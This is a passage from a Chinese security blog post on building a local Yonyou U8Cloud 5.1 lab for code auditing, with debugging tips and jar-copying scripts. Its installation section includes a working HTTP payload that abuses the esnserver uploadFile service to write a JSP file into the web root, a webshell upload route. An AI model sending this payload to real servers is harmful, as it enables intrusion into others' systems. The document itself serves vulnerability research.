<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Web, Security, Web安全, Java, Java安全">
    <meta name="description" content="记录一下我的网安学习">
    <meta name="author" content="1diot9">
    
    <title>
        
            用友U8Cloud环境搭建 |
        
        1diot9&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/baka.png">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#CCCCCC","title":"1diot9's Blog","author":"1diot9","avatar":"/images/baka.png","logo":"/images/baka.png","favicon":"/images/baka.png"},"menu":{"home":"/","archives":"/archives","tags":"/tags","categories":"/categories","about":"/about"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"登上山顶的人沉默不语，半途而废者诉说着旅途的艰辛","hitokoto":false},"social_contact":{"enable":true,"links":{"github":"https://www.github.com/1diot9","weixin":"img | /images/weixin.jpg","qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":true,"percent":false,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"updated","post_datetime_format":"YYYY-MM-DD HH:mm:ss"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":true,"share":false,"reward":{"enable":false,"img_link":null,"text":null,"icon":null},"img_align":"center"},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":true,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.39"},"waline":{"server_url":null,"reaction":false,"version":"3.3.2"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":true},"footer":{"since":2025,"word_count":true,"site_deploy":{"enable":true,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.5"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/baka.png">
                </a>
            
            <a class="site-name border-box" href="/">
               1diot9&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/tags">
                                
                                标签
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                分类
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/about">
                                
                                关于
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/tags">
                            
                            标签
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                            分类
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/about">
                            
                            关于
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        用友U8Cloud环境搭建
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/baka.png">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">1diot9</span>
                                
                                    <span class="author-badge">Lv4</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-08-16 19:58:56</span>
            </span>

            
                <span class="meta-info-item post-update-date">
                    <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                    <span class="datetime" data-updated="Tue Oct 21 2025 18:35:36 GMT+0800">2025-10-21 18:35:36</span>
                </span>
            
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>3.2k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>14 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>在配环境时踩了很多坑，尤其时调试的时候。这里把遇到的问题都记录一下，希望能给大家一点帮助。</p>
<h1 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h1><p>某鱼上收一个最新版本的就行，我收的是5.1的。收最新环境是为了之后挖洞，挖洞一般挑最新版本，这样挖到的洞适用性更广。以下说明均基于5.1版本。</p>
<p>收到的一般是一份数据库文件和一个安装包。我数据库用的是sql server 2016  数据库怎么初始化，收到的网盘里一般都会自带，再结合网上sql server的教程，应该能够自己解决。</p>
<p>这里建议把环境安装到虚拟机里，这样方便快照保存，同时以后换电脑也方便迁移。缺点是会多占用磁盘，而且还需要把各种lib从虚拟机里复制出来供远程调试使用。</p>
<p>注意，安装时的端口一定要选择一个不冲突的。</p>
<p>安装完成后，可以通过一个payload测试一下：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/service/esnserver</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1:8051</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>max-age=0</span><br><span class="line"><span class="attribute">sec-ch-ua</span><span class="punctuation">: </span>&quot;Not A(Brand&quot;;v=&quot;8&quot;, &quot;Chromium&quot;;v=&quot;132&quot;</span><br><span class="line"><span class="attribute">sec-ch-ua-mobile</span><span class="punctuation">: </span>?0</span><br><span class="line"><span class="attribute">sec-ch-ua-platform</span><span class="punctuation">: </span>&quot;Windows&quot;</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line"><span class="attribute">Token</span><span class="punctuation">: </span>469ce01522f64366750d1995ca119841</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span><span class="punctuation">: </span>none</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span><span class="punctuation">: </span>navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span><span class="punctuation">: </span>?1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span><span class="punctuation">: </span>document</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate, br</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>JSESSIONID=5AA7B7EB80F78BE269D5AEBE3ABE36FC.server</span><br><span class="line"><span class="attribute">If-None-Match</span><span class="punctuation">: </span>W/&quot;1215-1692092838000&quot;</span><br><span class="line"><span class="attribute">If-Modified-Since</span><span class="punctuation">: </span>Tue, 15 Aug 2023 09:47:18 GMT</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>keep-alive</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>239</span><br><span class="line"></span><br><span class="line"><span class="language-prolog">&#123;<span class="string">&quot;invocationInfo&quot;</span>:&#123;<span class="string">&quot;ucode&quot;</span>:<span class="string">&quot;123&quot;</span>,<span class="string">&quot;dataSource&quot;</span>:<span class="string">&quot;U8cloud&quot;</span>,<span class="string">&quot;lang&quot;</span>:<span class="string">&quot;en&quot;</span>&#125;,<span class="string">&quot;method&quot;</span>:<span class="string">&quot;uploadFile&quot;</span>,<span class="string">&quot;className&quot;</span>:<span class="string">&quot;nc.itf.hr.tools.IFileTrans&quot;</span>,<span class="string">&quot;param&quot;</span>:&#123;<span class="string">&quot;p1&quot;</span>:<span class="string">&quot;shelltext&quot;</span>,<span class="string">&quot;p2&quot;</span>:<span class="string">&quot;webapps/u8c_web/test1234.jsp&quot;</span>&#125;,<span class="string">&quot;paramType&quot;</span>:[<span class="string">&quot;p1:[B&quot;</span>,<span class="string">&quot;p2:java.lang.String&quot;</span>]&#125;</span></span><br></pre></td></tr></table></figure>

<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image.png"  alt="img"></p>
<p>这里会在&#x2F;webapps&#x2F;u8c_web&#x2F;test1234.jsp创建一个空文件，如果能成功的话，说明环境没问题。</p>
<h1 id="远程调试"><a href="#远程调试" class="headerlink" title="远程调试"></a>远程调试</h1><p>这里就比较坑，我原本是在startup.bat里添加命令行参数，启动时控制台确实显示监听，且idea远程调试也能连接上。但是就是无法在断点处停下。后面问了Killer师傅才知道，原来不是在startup.bat里改，而是在”D:\U8CERP\ierp\bin\prop.xml”里修改：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1758806785977.png"  alt="img"></p>
<p>当然，也可以直接复制启动参数，然后在cmd里加上调试参数去手动启动：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/85dfb7976e24fa443b1008f859e5c761.png"  alt="img"></p>
<p>这一点真实非常坑，差点让我出师未捷身先死。</p>
<h1 id="jar提取与反编译"><a href="#jar提取与反编译" class="headerlink" title="jar提取与反编译"></a>jar提取与反编译</h1><p>业务相关jar包位于：</p>
<p>1、modules目录</p>
<p>2、external目录</p>
<p>3、framework目录</p>
<p>另外，我这里安装的是5.1版本，有很神奇的一点，我发现业务相关的jar修改日期都是2024&#x2F;6&#x2F;23，对上面的几个目录都适用。</p>
<p>大部分业务代码位于modules文件夹中，所以需要把里面的jar包全部提取出来再反编译，这样idea才能直接查找代码里的内容。</p>
<p>首先使用下面的脚本，将jar包全部拷贝出来：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">setlocal enabledelayedexpansion</span><br><span class="line"></span><br><span class="line">rem Source and destination paths</span><br><span class="line">set &quot;SRC=D:\U8CERP\modules&quot;</span><br><span class="line">set &quot;DEST=D:\U8CERP\moduleJars&quot;</span><br><span class="line"></span><br><span class="line">rem Create destination directory if it does not exist</span><br><span class="line">if not exist &quot;%DEST%&quot; (</span><br><span class="line">    mkdir &quot;%DEST%&quot;</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">rem Copy all .jar files</span><br><span class="line">echo Copying all .class files from %SRC% to %DEST% ...</span><br><span class="line"></span><br><span class="line">for /r &quot;%SRC%&quot; %%f in (*.jar) do (</span><br><span class="line">    set &quot;rel=%%f&quot;</span><br><span class="line">    set &quot;rel=!rel:%SRC%=!&quot;</span><br><span class="line">    set &quot;rel=!rel:\=_!&quot;</span><br><span class="line"></span><br><span class="line">    echo Copying: %%f</span><br><span class="line">    copy &quot;%%f&quot; &quot;%DEST%\!rel!&quot; &gt;nul</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">rem Copy all &quot;classes&quot; folders recursively</span><br><span class="line">rem echo Copying all &quot;classes&quot; folders from %SRC% to %DEST% ...</span><br><span class="line">rem for /r &quot;%SRC%&quot; %%d in (classes) do (</span><br><span class="line">rem    if exist &quot;%%d&quot; (</span><br><span class="line">rem        echo Copying folder: %%d</span><br><span class="line">rem        xcopy &quot;%%d&quot; &quot;%DEST%\classes&quot; /e /i /y &gt;nul</span><br><span class="line">rem    )</span><br><span class="line">rem )</span><br><span class="line"></span><br><span class="line">echo All files copied successfully.</span><br><span class="line">pause</span><br></pre></td></tr></table></figure>

<p>现在有更好的方法。业务jar都是nc，u8c，com.yonyou开头的包名。可以写python脚本来筛选。然后再找到全部jar，从里面剔除之前找的业务jar，剩下的就是第三方jar了。</p>
<p>复制业务jar：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> zipfile</span><br><span class="line"><span class="keyword">import</span> shutil</span><br><span class="line"><span class="keyword">import</span> logging</span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置日志</span></span><br><span class="line">logging.basicConfig(level=logging.INFO, <span class="built_in">format</span>=<span class="string">&#x27;%(asctime)s - %(message)s&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check_jar_conditions</span>(<span class="params">jar_path</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;检查 JAR 文件的第一层目录中是否包含 &#x27;nc&#x27;、&#x27;u8c&#x27; 或者 com/yonyou&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">with</span> zipfile.ZipFile(jar_path, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> jar:</span><br><span class="line">            file_names = jar.namelist()</span><br><span class="line">            first_level_dirs = <span class="built_in">set</span>()</span><br><span class="line"></span><br><span class="line">            <span class="comment"># 获取 JAR 文件中的第一层目录</span></span><br><span class="line">            <span class="keyword">for</span> file <span class="keyword">in</span> file_names:</span><br><span class="line">                first_level = file.split(<span class="string">&#x27;/&#x27;</span>)[<span class="number">0</span>]</span><br><span class="line">                first_level_dirs.add(first_level)</span><br><span class="line"></span><br><span class="line">            <span class="comment"># 检查是否满足条件</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;nc&#x27;</span> <span class="keyword">in</span> first_level_dirs <span class="keyword">or</span> <span class="string">&#x27;u8c&#x27;</span> <span class="keyword">in</span> first_level_dirs:</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;com&#x27;</span> <span class="keyword">in</span> first_level_dirs:</span><br><span class="line">                <span class="comment"># 如果第一层目录是 &#x27;com&#x27;，检查第二层是否为 &#x27;yonyou&#x27;</span></span><br><span class="line">                <span class="keyword">for</span> file <span class="keyword">in</span> file_names:</span><br><span class="line">                    parts = file.split(<span class="string">&#x27;/&#x27;</span>)</span><br><span class="line">                    <span class="keyword">if</span> <span class="built_in">len</span>(parts) &gt;= <span class="number">2</span> <span class="keyword">and</span> parts[<span class="number">0</span>] == <span class="string">&#x27;com&#x27;</span> <span class="keyword">and</span> parts[<span class="number">1</span>] == <span class="string">&#x27;yonyou&#x27;</span>:</span><br><span class="line">                        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        logging.error(<span class="string">f&quot;无法处理 JAR 文件 <span class="subst">&#123;jar_path&#125;</span>: <span class="subst">&#123;e&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">copy_jar_files</span>(<span class="params">source_dir, target_dir</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;递归提取目录下的所有 JAR 包，并按 dir1_dir2_xxx.jar 格式重命名&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(target_dir):</span><br><span class="line">        os.makedirs(target_dir)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 遍历源目录中的所有文件</span></span><br><span class="line">    <span class="keyword">for</span> root, dirs, files <span class="keyword">in</span> os.walk(source_dir):</span><br><span class="line">        <span class="keyword">for</span> file <span class="keyword">in</span> files:</span><br><span class="line">            <span class="keyword">if</span> file.endswith(<span class="string">&#x27;.jar&#x27;</span>):</span><br><span class="line">                jar_path = os.path.join(root, file)</span><br><span class="line"></span><br><span class="line">                <span class="comment"># 判断该 JAR 包是否满足条件</span></span><br><span class="line">                <span class="keyword">if</span> check_jar_conditions(jar_path):</span><br><span class="line">                    <span class="comment"># 获取文件的相对路径并生成新的文件名</span></span><br><span class="line">                    relative_path = os.path.relpath(root, source_dir)</span><br><span class="line">                    new_filename = relative_path.replace(os.sep, <span class="string">&#x27;_&#x27;</span>) + <span class="string">&#x27;_&#x27;</span> + file</span><br><span class="line">                    target_path = os.path.join(target_dir, new_filename)</span><br><span class="line"></span><br><span class="line">                    <span class="comment"># 检查目标目录是否已有相同文件名</span></span><br><span class="line">                    counter = <span class="number">1</span></span><br><span class="line">                    <span class="keyword">while</span> os.path.exists(target_path):</span><br><span class="line">                        <span class="comment"># 如果文件已存在，给文件加上数字后缀</span></span><br><span class="line">                        name, ext = os.path.splitext(file)</span><br><span class="line">                        target_path = os.path.join(target_dir, <span class="string">f&quot;<span class="subst">&#123;new_filename.split(<span class="string">&#x27;.&#x27;</span>)[<span class="number">0</span>]&#125;</span>_<span class="subst">&#123;counter&#125;</span><span class="subst">&#123;ext&#125;</span>&quot;</span>)</span><br><span class="line">                        counter += <span class="number">1</span></span><br><span class="line"></span><br><span class="line">                    <span class="comment"># 复制 JAR 文件</span></span><br><span class="line">                    shutil.copy(jar_path, target_path)</span><br><span class="line">                    logging.info(<span class="string">f&quot;已复制符合条件的 JAR 文件: <span class="subst">&#123;jar_path&#125;</span> -&gt; <span class="subst">&#123;target_path&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="comment"># 输入源目录和目标目录</span></span><br><span class="line">    source_directory = <span class="string">&#x27;./&#x27;</span>  <span class="comment"># 替换为源目录路径</span></span><br><span class="line">    target_directory = <span class="string">&#x27;D:/U8CJars/ncJars&#x27;</span>  <span class="comment"># 替换为目标目录路径</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># 复制符合条件的 JAR 文件</span></span><br><span class="line">    copy_jar_files(source_directory, target_directory)</span><br></pre></td></tr></table></figure>

<p>复制第三方jar：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> shutil</span><br><span class="line"><span class="keyword">import</span> zipfile</span><br><span class="line"><span class="keyword">import</span> logging</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置日志</span></span><br><span class="line">logging.basicConfig(level=logging.INFO, <span class="built_in">format</span>=<span class="string">&#x27;%(asctime)s - %(message)s&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check_first_level_for_nc_or_u8c_or_yonyou</span>(<span class="params">jar_path</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;检查 JAR 文件中的第一层目录是否包含 &#x27;nc&#x27; 或 &#x27;u8c&#x27; 文件夹&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">with</span> zipfile.ZipFile(jar_path, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> jar:</span><br><span class="line">            file_names = jar.namelist()</span><br><span class="line">            first_level_dirs = <span class="built_in">set</span>()</span><br><span class="line"></span><br><span class="line">            <span class="comment"># 获取 JAR 文件中的第一层目录</span></span><br><span class="line">            <span class="keyword">for</span> file <span class="keyword">in</span> file_names:</span><br><span class="line">                first_level = file.split(<span class="string">&#x27;/&#x27;</span>)[<span class="number">0</span>]</span><br><span class="line">                first_level_dirs.add(first_level)</span><br><span class="line"></span><br><span class="line">            <span class="comment"># 检查是否满足条件</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;nc&#x27;</span> <span class="keyword">in</span> first_level_dirs <span class="keyword">or</span> <span class="string">&#x27;u8c&#x27;</span> <span class="keyword">in</span> first_level_dirs:</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;com&#x27;</span> <span class="keyword">in</span> first_level_dirs:</span><br><span class="line">                <span class="comment"># 